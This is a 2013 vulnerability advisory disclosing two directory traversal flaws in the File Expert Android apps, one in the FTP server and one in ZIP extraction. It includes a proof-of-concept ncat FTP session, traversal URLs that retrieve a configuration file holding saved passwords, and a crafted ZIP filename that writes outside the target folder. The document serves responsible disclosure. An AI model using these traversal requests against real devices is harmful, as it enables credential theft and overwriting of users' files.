by Tan Chew Keong
Release Date: 2013-06-21
[en] [jp]
Summary
Two directory traversal vulnerabilities have been found in GeekSoft File Expert and File Expert HD. When exploited, these vulnerabilities allow an attacker to gain access to the application's configuration files or to write files to arbitrary locations within the SD card of the user's Android device.
Tested Versions
Details
This advisory discloses two directory traversal vulnerabilities in GeekSoft File Expert and File Expert HD. When exploited, these vulnerabilities allow an attacker to gain access to the application's configuration files or to write files to arbitrary locations within the SD card of the user's Android device.
Vulnerability 1 - Directory Traversal in FTP Server
The FTP server does not properly sanitise FTP requests containing directory traversal sequences (forward-slash ../) in their filenames. This can be exploited by authenticated malicious attackers to download the application's configuration files which can contain the user's saved passwords.
An example of a malicious FTP request is shown below.
C:\>ncat 192.168.1.102 2211
220 File Expert FTP Server for Android Froyo Ready
USER username
331 Send password
PASS passsword
230 Access granted
PORT 192,168,1,100,164,25
200 PORT OK
RETR /../../../../../../data/data/xcxin.fehd/shared_prefs/FE_SMB_SERVER.xml
150 Sending file
226 Transmission finished
Vulnerability 2 - Directory Traversal in ZIP Extraction
When extacting compressed files from a ZIP archive, the ZIP extraction functionality does not properly sanitise compressed files that have directory traversal sequences in their filenames. By tricking a user to extract a specially crafted ZIP archiving containing files with directory traversal sequences in their filenames, an attacker can potentially write files to arbitrary locations within the SD card of the user's Android device.
For example, a malicious ZIP archive can contain a compressed file with the following filename:
/../../../../../../../../mnt/sdcard/DCIM/zipPOC.txt
POC / Test Code
The instructions below illustrates how this vulnerability can be reproduced using File Expert HD. The steps for reproducing the vulnerability on File Expert are very similar, and hence, will not be repeated.
Instructions for testing FTP Server (Vulnerability 1):
- Start the FTP Server in File Expert HD on an Android device.
- Use the Firefox browser to access the FTP Server and confirm that some basic directory traversal protection exists. i.e. CWD .. is blocked.
- Now, use the FTP Server directory traversal vulnerabilty to access File Expert HD's data folder by navigating directly to the following FTP URL containing directory traversal sequences. Note: Change IP address in the URL to the IP address of your Android device.
ftp://192.168.1.102:2211/../../../../../../data/data/xcxin.fehd/shared_prefs/
Or, the following if you are testing using File Expert
ftp://192.168.1.102:2211/../../../../../../data/data/xcxin.filexpert/shared_prefs/
- Download the FE_SMB_SERVER.xml file and note that it contains the user's FTP client password if the user has configured FTP client settings in File Expert HD.
- By exploiting this vulnerability, a authenticated malicious attacker can download the application's configuration files which can contain the user's saved passwords.
Instructions for testing ZIP extraction (Vulnerability 2):
- Please download the POC ZIP archive here and follow the instructions below.
- Copy the POC ZIP archive into the Download directory of your Android device.
- IMPORTANT: Ensure that the /mnt/sdcard/DCIM/ directory exists on your Android device in order for the POC to work.
- Decompress the POC ZIP archive into the current path.
- When the extraction completes, navigate to the /mnt/sdcard/DCIM directory. You'll notice that zipPOC.txt has been extracted into /mnt/sdcard/DCIM/zipPOC.txt instead of into /mnt/sdcard/Download/FileExpertPOC/zipPOC.txt.
Hence, by tricking a user to extract a specially-crafted ZIP archive, an attacker can potentially exploit this issue to write files into arbitrary locations within the SD card in the user's Android device, or to overwrite files in known locations within the SD card.
For example, an attacker who is aware of the filenames of the user's photo in the /mnt/sdcard/DCIM/ directory can exploit this vulnerability to overwrite the user's photo files.
Patch / Workaround
Do not allow untrusted persons to access your FTP file share and avoid extracting untrusted ZIP files.
Disclosure Timeline
2013-05-26 - Vulnerability Discovered.
2013-05-26 - Initial Vendor Notification.
2013-05-27 - Vulnerability Details Sent to Vendor.
2013-05-31 - Asked vendor for release date of fixed version (no reply).
2013-06-05 - Asked vendor for release date of fixed version (no reply).
2013-06-11 - Asked vendor for release date of fixed version (no reply).
2013-06-13 - Vendor replied that they are still working on it and will release update later in the week.
2013-06-19 - Vendor released File Expert version 5.2.0 and File Expert HD 1.0.5
2013-06-19 - Tested new versions and found that vulnerability is not fixed.
2013-06-21 - Public Release.